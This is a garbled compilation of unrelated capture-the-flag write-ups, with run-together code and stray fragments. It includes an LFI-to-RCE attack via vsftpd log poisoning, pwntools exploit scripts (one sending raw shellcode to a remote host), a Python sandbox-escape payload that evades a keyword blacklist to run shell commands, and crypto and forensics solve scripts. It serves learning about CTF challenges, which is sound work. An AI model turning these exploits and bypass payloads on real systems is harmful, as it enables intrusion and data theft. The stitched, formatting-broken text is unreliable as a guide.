input.txtnc ip port < input.txt```
We have two links in task – [website of logging service](http://challenge.nahamcon.com:31042) and [ftp_server](http://challenge.nahamcon.com:30199). We can guess that it is ftp server, because of "FTP can be used to access raw files if needed" in logging service description, or by connecting via netcat:```~ nc challenge.nahamcon.com 30199220 Welcome to FTP Server```But unfortunately we can't get access to FTP because we don't know username and password:```~ ftp challenge.nahamcon.com 30199Connected to challenge.nahamcon.com.220 Welcome to FTP ServerName (challenge.nahamcon.com:dizvyagintsev): idontknowusername331 Please specify the password.Password: idontknowpassword530 Login incorrect.ftp: Login failed.```Let's examine site a bit more, button "Learn more about our pricing" send us to http://challenge.nahamcon.com:31042/index.php?file=pricing. We can see that filename sends as GET param, so we can try local file enclusion.![LFI](https://i.ibb.co/3N4bKKq/2021-03-16-14-07-57.png)But we don't know in which file flag is, so we should find a way to execute remote code on server. I tried some ways from this [cheat sheet ](https://highon.coffee/blog/lfi-cheat-sheet/), but nothing worked. From /etc/passwd we can find out that logging service use apache as webserver and vsftpd as FTP server:```apache:x:100:101:apache:/var/www:/sbin/nologinvsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin```We can control content of their logs, so if we can open apache or vsfpd logs we can inject php code on site and execute remote code. We can't open apache logs `/var/log/apache2/access.log` but `/var/log/vsftpd.log` works.![vsftpd logs](https://i.ibb.co/NSXmbxn/2021-03-16-14-39-21.png)We can see that vsftpd logs username, so if it will be valid php code in ``, so we can execute bash command from cmd GET param.```ftp challenge.nahamcon.com 30199Connected to challenge.nahamcon.com.220 Welcome to FTP ServerName (challenge.nahamcon.com:dizvyagintsev): 331 Please specify the password.Password:530 Login incorrect.ftp: Login failed.```Let's use `find / -name 'flag.txt' | xargs cat` command that will recursively search for flag.txt file, starting from root directory and cat its content.![flag](https://i.ibb.co/CmTrwLn/2021-03-16-14-56-49.png)
```from pwn import * #context(arch='amd64',log_level='debug')p = process('./the_list')give_flag_addr = 0x0401369p.sendlineafter('Enter your name: ', 'A') for i in range(16): p.sendlineafter('> ', '2') p.sendlineafter("Enter the user's name: ", 'A') payload = "A" * 0x08 + p64(give_flag_addr)p.sendlineafter('> ', '4')p.sendlineafter('What is the number for the user whose name you want to change? ', '19')p.sendlineafter("What is the new user's name? ", payload) p.sendlineafter('> ', '5')p.interactive()```
## beginner ### stringy thingsDescription:*I know there's a string in this binary somewhere.... Now where did I leave it?* We get a calc file. lets use the command 'file' to see what it actually is:```shell~/Downloads$ file calccalc: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8be49a90c694a4f14dd0735d7ad2ffb200753cfb, for GNU/Linux 3.2.0, not stripped```So an ELF file is an executable in Linux. It gets generated after it has been through the complile and build process in an SDK (Software Development Kit) So generallty we can read all files in Linux so lets see what it shows us.```shell~/Downloads$ cat calc ELF>`@:@8 @@@@h����� ���-�=�=X`�-�=�=����DDP�td� � � 44Q�tdR�td�-�=�=/lib64/ld-linux-x86-64.so.2GNU�䚐Ɣ��M�s]z���u<�GNUs !7� � `� � !�=�=�=�?@0@@@��P��=�������!����=��=��=�� @�Y��@@ 7"abi-note.c__abi_taginit.ccrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrycalc.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable_edata__stack_chk_fail@@GLIBC_2.4printf@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__isoc99_scanf@@GLIBC_2.7__TMC_END___ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.got.plt.data.bss.comment�#��$6�� D�N�o� �� � 4�!!������=�-��?��@�0@0@@@�0@0X0`5��� �6S```This is only part of the file but it gives us an idea but is not an easy way to read and doesn't really give us any clues. Having read it with cat, we notice that it gives us a mix of human and other character types. With the title hinting towards the 'strings' command. Let's give that a go. From the man page:*_strings_ is mainly useful for determining the contents of non-text files. ... _strings_(1) - Linux man page. Name. strings- print the strings of printable characters in files.* ```shell~/Downloads$ strings calc/lib64/ld-linux-x86-64.so.2__isoc99_scanf__stack_chk_failprintf__cxa_finalize__libc_start_mainlibc.so.6GLIBC_2.7GLIBC_2.2.5GLIBC_2.4_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableu3UH[]A\A]A^A_Enter an operator (+, -, *,): Enter two operands: %lf %lf%.1lf + %.1lf = %.1lf%.1lf - %.1lf = %.1lf%.1lf * %.1lf = %.1lf%.1lf / %.1lf = %.1lfError! operator is not correct``` Now that is easier to read as it is by line. However there are 87 lines to look through and the types of file can contain thousands of lines. What we can use is a command that will help us look for patterns. In this case 'grep'Again utilising the man page:*The _grep_ utility shall search the input files, selecting lines matching one or more patterns; the types of patterns are controlled by the options specified.* OK Can we just 'grep' the file calc? Yes we could and it would give us the same answer. But since we have already used 'strings', lets take that output and put it into 'grep'. To do this in Linux, we 'pipe' it from one command into another.*strings | grep* One more thing. Now grep is used to find patterns but we need to give it some options. Generally we know the CTF flag stype and in this case it is utflag{} with words between the brackets. That being the case we can ask 'grep' to search for this pattern and if we generalise the characters withing it (i.e. search for anything in there) then we should be able to print off the flag. ```shell~/Downloads$ strings calc | grep -oE utflag{.?*}utflag{strings_is_op}```- -o, --only-matching (show only nonempty parts of lines that match)- -E, --extended-regexp (PATTERNS are extended regular expressions) As I mentioned we can do this to the file so the command is still the same, less strings but adding the file name.```shell~/Downloads$ grep -oEa utflag{.?*} calc utflag{strings_is_op}``` And finally we can actually use 'cat'. The only difference is that his time, we need to tell 'grep' that we are reading as text.```shell~/Downloads$ cat calc | grep -oE utflag{.?*}Binary file (standard input) matches```Here without -a it tells us it finds a match in a binary file.```~/Downloads$ cat calc | grep -oEa utflag{.?*}utflag{strings_is_op}``` Adding the additional option of -a now finds the flag. - -a, --text (equivalent to --binary-files=text) ### HTMLDescription:*I hid a flag somewhere in the code of the UTCTF website, can you find it?* We get a link to the website. https://www.isss.io/utctf/ Lets look at the source code and bang!! We have the flag. ![](./images/utctf001a.png) utflag{you_found_me_0123959} ### Magic BytesDescription:*My friend sent me this text file and said they put a flag inside. I opened it and it doesn't look like a normal text file to me! Maybe you'll be able to find it.* We get a .txt file. Again lets check it out with 'file' ```shell~/Downloads$ file out.txt out.txt: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced``` OK now we know it is a png file, lets use the default image viewer Eye of Gnome to check out the file ```shell~/Downloads$ eog out.txt``` ![](./images/utctf001b.png) Now we have the flag.utflag{file_extensions_mean_nothing} ### Run ElfDescription:*Anyone know how to run an ELF file? I bet you could figure it out.* We get a run file. Again lets check it out with 'file'```shell~/Downloads$ file runrun: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e29057709baef974009b1e676fd113ed20f1942f, for GNU/Linux 3.2.0, not stripped```Lets check to see what the file permissions are with 'ls'```shell~/Downloads$ ls -l run-rw-rw-r-- 1 jim jim 16600 Mar 13 07:56 run```OK So we see it is not an executable file. Lets make it so.```~/Downloads$ chmod +x run ~/Downloads$ ls -l run-rwxrwxr-x 1 jim jim 16600 Mar 13 07:56 run``` We can now see the executable bit in place. SO to run the file we do it within the current folder.```shell~/Downloads$ ./runutflag{run_run_binary_9312854}``` We now get the flag. utflag{run_run_binary_9312854} ### Cipher GauntletDescription:*Can you make it through all of the encodings and ciphers?* We get a text file. Again lets check it out with 'cat'```shell/Downloads$ cat secret.txt 01010101 01101000 00101101 01101111 01101000 00101100 00100000 01101100 01101111 01101111 01101011 01110011 00100000 01101100 01101001 01101011 01100101 00100000 01110111 01100101 00100000 01101000 01100001 01110110 01100101 00100000 01100001 01101110 01101111 01110100 01101000 01100101 01110010 00100000 01100010 01101100 01101111 01100011 01101011 00100000 01101111 01100110 00100000 01110100 01100101 01111000 01110100 00101100 00100000 01110111 01101001 01110100 01101000 00100000 01110011 01101111``` OK there is a lot of what appears to be binary code. With it being a challenge with a lot of codes and ciphers, lets upload the file to GCHQ's CyberChef. This will allow us to add a number of sections to 'bake' a solution. Right lets try binary first. We get a new selection of text with some instructions. ```Uh-oh, looks like we have another block of text, with some sort of special encoding. Can you figure out what this encoding is? (hint: if you look carefully, you'll notice that there only characters present are A-Z, a-z, 0-9, and sometimes / and +. See if you can find an encoding that looks like this one.)TmV3IGNoYWxsZW5nZSEgQ2FuIHlvdSBmaWd1cmUgb3V0IHdoYXQncyBnb2luZyBvbiBoZXJlPyBJdCBsb29rcyBsaWtlIHRoZSBsZXR0ZXJzIGFyZSBzaGlmdGVkIGJ5IHNvbWUgY29uc3RhbnQuIChoaW50OiB5b3UgbWlnaHQgd2FudCB0byBzdGFydCBsb29raW5nIHVwIFJvbWFuIHBlb3BsZSkuCm15eHFia2Rldmtkc3l4YyEgaXllIHJrZm8gcHN4c2Nyb24gZHJvIGxvcXN4eG9iIG1iaXpkeXFia3pyaSBtcmt2dm94cW8uIHJvYm8gc2MgayBwdmtxIHB5YiBrdnYgaXllYiBya2JuIG9wcHliZGM6IGVkcHZrcXt4eWdfaXllYm9fenZraXN4cV9nc2RyX21iaXpkeX0uIGl5ZSBnc3Z2IHBzeG4gZHJrZCBrIHZ5ZCB5cCBtYml6ZHlxYmt6cmkgc2MgbGVzdm5zeHEgeXBwIGRyc2MgY3liZCB5cCBsa2NzbSB1eHlndm9ucW8sIGt4biBzZCBib2t2dmkgc2MgeHlkIGN5IGxrbiBrcGRvYiBrdnYuIHJ5em8gaXllIG94dHlpb24gZHJvIG1ya3Z2b3hxbyE=``` The spacer at the end of the code indicates that it might be Base64. Lets try that in Cyberchef.```New challenge! Can you figure out what's going on here? It looks like the letters are shifted by some constant. (hint: you might want to start looking up Roman people).myxqbkdevkdsyxc! iye rkfo psxscron dro loqsxxob mbizdyqbkzri mrkvvoxqo. robo sc k pvkq pyb kvv iyeb rkbn oppybdc: edpvkq{xyg_iyebo_zvkisxq_gsdr_mbizdy}. iye gsvv psxn drkd k vyd yp mbizdyqbkzri sc lesvnsxq ypp drsc cybd yp lkcsm uxygvonqo, kxn sd bokvvi sc xyd cy lkn kpdob kvv. ryzo iye oxtyion dro mrkvvoxqo!``` The hint here relates to Romans. They used to use a Caesar Cipher which is a rotating cipher. In CyberChef they call this ROT13. Lets try that.```zlkdoxqrixqflkp! vlr exsb cfkfpeba qeb ybdfkkbo zovmqldoxmev zexiibkdb. ebob fp x cixd clo xii vlro exoa bccloqp: rqcixd{klt_vlrob_mixvfkd_tfqe_zovmql}. vlr tfii cfka qexq x ilq lc zovmqldoxmev fp yrfiafkd lcc qefp ploq lc yxpfz hkltibadb, xka fq obxiiv fp klq pl yxa xcqbo xii. elmb vlr bkglvba qeb zexiibkdb!```So even though it is ROT13, we still can't read the file. However the hint says it is shifted, so we have an option to change this. Click on the updown arrows to shift by one each time and watch the code change. When youhit shift 16, we have the final flag.```congratulations! you have finished the beginner cryptography challenge. here is a flag for all your hard efforts: utflag{now_youre_playing_with_crypto}. you will find that a lot of cryptography is building off this sort of basic knowledge, and it really is not so bad after all. hope you enjoyed the challenge!``` The flag utflag{now_youre_playing_with_crypto} ### Sizzling BaconDescription:*My buddy Francis is _really_ into Bacon. He loves it so much that he gave me this encoded bacon-themed flag (he said he was inspired by the sound of sizzling bacon).* We get a text string. *sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs}* Bacon is highlighted a number of times. If we do a search for bacon and cipher, we find that it does exist. From wikipedia:*Bacon's cipher or the Baconian cipher is a method of steganographic message encoding devised by Francis Bacon in 1605. A message is concealed in the presentation of text, rather than its content.* We can use CyberChef again. Simply search for Bacon and it brings up the Bacon Cipher Decode Operation. Play about with the options:- Alphabet (Complete)- Translation (Case) And we get the flag:UTFLAGCRISPYBACONCIPHERAmend it with braces and #boom, the next flag. UTFLAG{CRISPYBACONCIPHER}
*tl;dr: double free -> tcache poison* [https://blackbeard666.github.io/pwn_exhibit/content/2021_CTF/nahamconCTF/meddle_writeup.html](https://blackbeard666.github.io/pwn_exhibit/content/2021_CTF/nahamconCTF/meddle_writeup.html)
# Kindergarten The task has a simple buffer overflow located in function kinder. After accepting 4 symbols “y” or “Y” the application allows to enter one more question which is written into a memory buffer which is less than the number of bytes the app allows to read.Since the stack has no protections it is possible to overwrite the RIP address. An appropriate address for execution is 0x40093F located in function “kids_are_not_allowed_here”. This function executes buffer ans which is in bss section and has user-controlled data inside (written before the input of question starts).The problem is that the binary has seccomp enabled which prohibits use of some syscalls. It is impossible to call execve to gain remote shell session. That is why it was necessary to write shellcode to read file flag.txt located near the vulnerable binary on the server. The shellcode is given in the exploit code: ```Pythonfrom pwn import *context.terminal = ['terminator', '-e']#io = process("./kindergarten")io = remote("docker.hackthebox.eu", 30323)d = io.read()print(d)shellcode = b"\x31\xF6\xF7\xE6\x52\x48\xC7\xC1\x78\x74\x00\x00\x51\x48\xB9\x2E\x2F\x66\x6C\x61\x67\x2E\x74\x51\x54\x5F\xB0\x02\x0F\x05\x50\x5F\x54\x5E\x52\x52\x52\x52\x58\x66\xBA\x99\x09\x0F\x05\x5F\xFF\xC7\x50\x5A\x58\xFF\xC0\x0F\x05\x58\xB0\x3C\x0F\x05"io.sendline(shellcode)for i in range(4): d = io.read() print(d) io.sendline(b'Y') d = io.read() print(d) io.sendline(b'AAAA')payload = b"A"*140 + p64(0x40093F)io.sendline(payload)io.interactive()``` The successful exploitation can be seen on Figure 1. ![](https://raw.githubusercontent.com/kukuxumushi/HTBxUNI-CTF-quals-writeups/master/pictures/2021-03-07-22-53-48.png) Figure 1 – The successful expluatation Flag: HTB{2_c00l_4_$cH0oL!!}.
# Challenges - [Challenges](#challenges) - [OSINT](#osint) - [#NahamCon2021](#nahamcon2021) - [Read the rules](#read-the-rules) - [Hackerone](#hackerone) - [Discord Nahansec](#discord-nahansec) - [Merch Store](#merch-store) - [INE](#ine) - [HTB](#htb) - [Googgle Play](#googgle-play) - [Miscellaneous](#miscellaneous) - [esab64](#esab64) - [Shoelaces](#shoelaces) - [Pollex](#pollex) - [buzz](#buzz) - [Veebee](#veebee) ## OSINT ### #NahamCon2021 Twitter (<https://twitter.com/NahamSec>)`` flag{e36bc5a67dd2fe5f33b62123f78fbcef} `` ### Read the rules <https://ctf.nahamcon.com/rules>HTML Source `` flag{90bc54705794a62015369fd8e86e557b} `` ### Hackerone Discord[announcements](https://discord.com/channels/514337135491416065/534475139602055168) ``Synt{rr907q188039nr543o81sq237o6o6q0o}`` [CyberChef](https://gchq.github.io/CyberChef/)Recipe:rot13`` Flag{ee907d188039ae543b81fd237b6b6d0b} `` ### Discord Nahansec Channel sub-title is the flag. - UHC-BR- Red Team Village- Live Recon Village- IoT Village- INE Career Corner- HTB Village ### Merch Store ### INE <https://checkout.ine.com/starter-pass> Page inspection = Deep on the page there's this base64 string ```Bashecho "ZmxhZ3syOWZhMzA1YWFmNWUwMWU5ZWRjZjAxNDJlNGRkY2RiOX0=" | base64 -d``` `` flag{29fa305aaf5e01e9edcf0142e4ddcdb9} `` ### HTB Dropped in parts over twitter and discord<https://twitter.com/hackthebox_eu/status/1371146586391261189><https://discord.com/channels/473760315293696010/477042310467813376> ``flag{57a3ca8be987fb8b7ea0a72e1124e302}`` ### Googgle Play Hint: <https://twitter.com/jon_bottarini/status/1370926690612826112> <https://static.googleusercontent.com/media/www.google.com/pt-BR//about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf> search for flag{ camouflage font `` flag{a0a6cb3b4bc98bf2a34b7aed76aebf53} `` ## Miscellaneous ### esab64 ```Bash$cat esab64mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X``` [Cyberchef](https://gchq.github.io/CyberChef/)Recipe: 1. Reverse2. From Base643. Reverse ### Shoelaces ```Bash$strings shoelaces.jpg``` `` flag{137288e960a3ae9b148e8a7db16a69b0} `` ### Pollex More than one jpg file concatenated to identify used binwalk and to remove the second file used dd. ```Bash$ binwalk pollex.jpg DECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 JPEG image data, JFIF standard 1.0130 0x1E TIFF image data, little-endian offset of first image directory: 8334 0x14E JPEG image data, JFIF standard 1.01364 0x16C TIFF image data, little-endian offset of first image directory: 8848 0x350 JPEG image data, JFIF standard 1.016731 0x1A4B Copyright string: "CopyrightOwner> <rdf:Seq/> </plus:CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Ste"6765 0x1A6D Copyright string: "CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Stevanovic Igor</rdf:li> </rdf:Seq> <"``` ```Bashdd if=pollex.jpg bs=512k | { dd bs=334 count=1 of=/dev/null; dd bs=512k of=trimmed_pollex.jpg; }``` Flag printed on the image trimmed_pollex.jpg`` flag{65c34alec121a286600ddd48fe36bc00} `` ### buzz ```Bashfile buzz gunzip buzz``` ``flag{b3a33db7ba04c4c9052ea06d9ff17869}`` ### Veebee To decode the VBE script have tried: <https://didierstevens.com/files/software/decode-vbe_V0_0_1.zip> But didn't work Google-fu find the tool <https://github.com/JohnHammond/vbe-decoder/> `` flag{f805593d933f5433f2a04f082f400d8c} ``
**Full writeup:** https://www.kaggle.com/chrsow/utctf-2021-writeup-virtual-machine-monitor-uwu **Summary:** Recover exponent `n` from cache vectors data computed by a function. **Solution:** Learn a pattern from the lab data and use it to predict with the target data.
# Tony And James Writeup (45 solves / 472 points)> :arrow_down: [Chall FIle](https://github.com/r3yc0n1c/CTF-Writeups/raw/main/2021/darkCON-2021/Crypto/Tony%20And%20James/dist/Tony%20And%20James.zip) ### [Source Script](dist/src.py)```py#!/usr/bin/env python3import random # custom seed generationdef get_seed(l): seed = 0 rand = random.getrandbits(l) raw = list() while rand > 0: rand = rand >> 1 seed += rand raw.append(rand) if len(raw) == l: return raw, seed else: return get_seed(l) def encrypt(m): l = len(m) raw, seed = get_seed(l) # get raw_state and seed random.seed(seed) with open('encrypted.txt', 'w') as f: # char by char encoding of the FLAG for i in range(l): r = random.randint(1, 2**512) if i == 0: print("r0 =",r) # the 1st random number (r0) that we have encoded = hex(r ^ m[i] ^ raw[i])[2:] f.write(f"F{i}: {encoded}\n") def main(): m = open('flag.txt').read() encrypt(m.encode()) # Encrypt the FLAG if __name__=='__main__': main()``` The leakage of 1st generated random number makes the encryption vulnerable because we already know the flag format. So we can use the leaked random number and the **Known Plaintext Attack** on the **XOR Encryption** to obtain the **seed**. After generating the seed, we can set the seed and we will obtain the same random numbers that were used in the encryption ([same seed produces same random numbers](https://stackoverflow.com/questions/22639587/random-seed-what-does-it-do#answer-22639752))and then decrypt the flag. ### [Solve Script](sol/apex.py)```pyimport random def get_seed(raw_00, l): seed = 0 raw = [raw_00] for i in range(1,l): seed += raw_00 raw.append(raw_00 >> 1) raw_00 = raw_00 >> 1 return raw, seed def decrypt(file, r0): """ By Properties of XOR, encoded[i] = r ^ m[i] ^ raw[i] raw[i] = r ^ m[i] ^ encoded[i] For i = 0 we know, m[0] = 'd' ( because flag format is darkCON{} ) r = r0 encoded[0] = first encoded hex (F0) """ # Calculate start of seed raw_00 = r0 ^ ord('d') ^ int(file[0].split(': ')[1], 16) l = len(file) raw, seed = get_seed(raw_00, l) random.seed(seed) flag = '' for i in range(l): x = int(file[i].split(': ')[1], 16) r = random.randint(1, 2**512) flag += chr(x ^ raw[i] ^ r) print(flag) file = open('encrypted.txt').read().strip().split('\n')r0 = 13006113194937977865329550196847254275750805445133166331150790640161443707848964445638439062364681023973459358767889599334590592762861309365461149844507558decrypt(file, r0)``` ## Flag> darkCON{user_W4rm4ch1ne68_pass_W4RM4CH1N3R0X_t0ny_h4cked_4g41n!}
# Python Shell ## Task Upload a Python file that can be run by invoking the python command, and we will run it for you. To do so, send the bytes over the stream, and close the write half. stdout will be sent back. For security reasons, we may refuse to run your file if we detect dangerous strings. There is a byte limit and a timeout. nc misc.utctf.live 4353 ## Solution First you hat to create a connection and halfclose it. This is best done with `socat -t1 - TCP:misc.utctf.live:4353`. So now to the payload. A simple `print('xxx')` returns xxx so far so good. But if we just try to: `print(open('/flag.txt').read())` we get: ```Files must be uploaded within 2 seconds. Scripts must run within 2 seconds. Only the first 4096 bytes will be considered.Blacklist: (eval)|(import)|(open)|(with)|(as)|(from)|(lambda)|(\s*print\s*=\s*)|(?P<paren>\()Whitelist: (\s*print\s*(?P<paren>\())``` So we know what is prohibited: `eval|import|open|with|as|from|lambda|print = |` and what is that?`(` open parentheses... ok thats "new"... So to get around the forbidden `open` we could do something like: `eval('op' + 'en'('flag.txt'))` but eval is forbidden as well. A simple `__builtins__.__dict__['ev' + 'al']` will solve that, so now to the `(`. Since it is a string it can be replaced with `int.__doc__[3]`. `__builtins__.__dict__['ev' + 'al']`('print' + int.__doc__[3] + 'op' + 'en' + int.__doc__[3] + '\'/flag.txt\')' + '.read' + int.__doc__[3] + '))')` So maybe something like that? But wait there is still a `(` at char(40) damn! How to get rid of that? I didn't find a way to get rid of it directly, but there was mention of a "whitelist" before. `Whitelist: (\s*print\s*(?P<paren>\())`For `print(` the `(` is ok, good to know! Let's try `p = 'print' + int.__doc__[3] + 'op' + 'en' + int.__doc__[3] + '\'/flag.txt\')' + '.read' + int.__doc__[3] + '))'; __builtins__.__dict__['print'] = __builtins__.__dict__['ev' + 'al']; print(p + "")` No answer... debugging it locally gave me the flag via stderr while throwing an exception, but the server only forwards stdout. So I changed the `open('/flag.txt').read()` part to `os.system('cat /flag.txt')` Resulting in: `p = '__builtins__.__i' + 'mport__' + int.__doc__[3] + '"os").system' + int.__doc__[3] + '"cat /flag.txt")'; __builtins__.__dict__['print'] = __builtins__.__dict__['ev' + 'al']; print(p)"` as the final payload. ```echo "p = '__builtins__.__i' + 'mport__' + int.__doc__[3] + '"os").system' + int.__doc__[3] + '"cat /flag.txt")'; __builtins__.__dict__['print'] = __builtins__.__dict__['ev' + 'al']; print(p)" > payload`cat payload | socat -t1 - TCP:misc.utctf.live:4353Files must be uploaded within 2 seconds. Scripts must run within 2 seconds. Only the first 4096 bytes will be considered.utflag{unclean_input}```
# esab64 The challenges gives a file called `esab64` with an encoded message. The first thing i though was trying to decode the message with base64. The thing is that the result was not... something clear. After a while, an idea came to my mind: esab64 looks like base64 but in reverse so... why not trying to reverse the initial message and then decode it with base64. My idea seems to have worked: ```_}e61e711106bd0db1b78efa894b1125bf{galf``` I just had to reverse that message again to get the flag: ```flag{fb5211b498afe87b1bd0db601117e16e}_```
TL;DR * Shanks's giantstep-babystep algorithm (or just bruteforce) to find the Diffie-Hellman shared secret* use shared secret as key for hmac-md5. Message = (sequence number || bit)* the resulting hash will match for either 0 or 1. Remember this bit.* once you have all the right bits, binary -> hex gives you the flag
We are given a .json file with N(modules), e(encryption) and ct(encrypted message){"N": 148818474926605063920889194160313225216327492347368329952620222220173505969004341728021623813340175402441807560635794342531823708335067243413446678485411066531733814714571491348985375389581214154895499404668547123130986872208497176485731000235899479072455273651103419116166704826517589143262273754343465721499,"e": 3,"ct": 4207289555943423943347752283361812551010483368240079114775648492647342981294466041851391508960558500182259304840957212211627194015260673748342757900843998300352612100260598133752360374373} We can see that the encryption(e) is very small and also that c is relatively very small compared to NBecause these two things we can try and take the cube root (root 3) of our encrypted message (ct) So now that we know what to do lets write the code for it.I wrote the code in python using gmpy2 and pycrypto libraries (gmpy2 for the cube root and pycrypto to make the numbers bytes and from then to strings) First of all lets import our libraries:import gmpy2 #to do the cube rootfrom Crypto.Util.number import long_to_bytes #to print it in a readable way Secondly lets write what is n(modules), e(encryption) and c(ct) are (from now on I will say c instead of ct or encrypted text/cipher): n = 148818474926605063920889194160313225216327492347368329952620222220173505969004341728021623813340175402441807560635794342531823708335067243413446678485411066531733814714571491348985375389581214154895499404668547123130986872208497176485731000235899479072455273651103419116166704826517589143262273754343465721499 e = 3 c = 4207289555943423943347752283361812551010483368240079114775648492647342981294466041851391508960558500182259304840957212211627194015260673748342757900843998300352612100260598133752360374373 Now lets take the cube root of c and store it in a variable: gmpy2.get_context().precision=2048 #So it will be precise, I'm not going to fully explain what gmpy2 or this command does herer, feel free to go look at the documentation m = gmpy2.root(c,e) #taking the cube root(e or 3) of the message Lastly we need to print the deciphered message: print(long_to_bytes(m).decode()) #prints the deciphered message All the code together (in python 3.8.5 and with less comments):import gmpy2from Crypto.Util.number import long_to_bytes n = 148818474926605063920889194160313225216327492347368329952620222220173505969004341728021623813340175402441807560635794342531823708335067243413446678485411066531733814714571491348985375389581214154895499404668547123130986872208497176485731000235899479072455273651103419116166704826517589143262273754343465721499e = 3c = 4207289555943423943347752283361812551010483368240079114775648492647342981294466041851391508960558500182259304840957212211627194015260673748342757900843998300352612100260598133752360374373 gmpy2.get_context().precision=2048 #setting precision to be 2048m = gmpy2.root(c,e) #getting the cube root(root 3) of c print(long_to_bytes(m).decode()) #printing the flag/message Running the code (saved the code as flag-Bootless_RSA.py):--> python3 flag-Bootless_RSA.pydvCTF{RS4_m0dul0_inf1nity}